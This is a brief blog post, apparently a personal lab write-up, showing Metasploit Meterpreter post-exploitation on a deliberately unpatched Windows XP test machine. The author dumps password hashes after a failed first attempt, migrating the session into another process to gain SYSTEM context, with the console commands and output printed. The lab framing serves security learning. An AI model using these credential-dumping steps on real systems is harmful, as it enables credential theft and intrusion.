This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
I attempted to obtain the password hashes from the exploited system:
meterpreter > run hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_query_value: Operation failed: The handle is invalid.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
But this failed and hinted that I should migrate into service process, which I did:
meterpreter > run post/windows/manage/migrate
[*] Running module against LAB
[*] Current server process: ALqkE.exe (3740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3672
[+] Successfully migrated to process 3672
After which run hashdump worked perfectly.
I have blogged on obtaining the password hashes previously.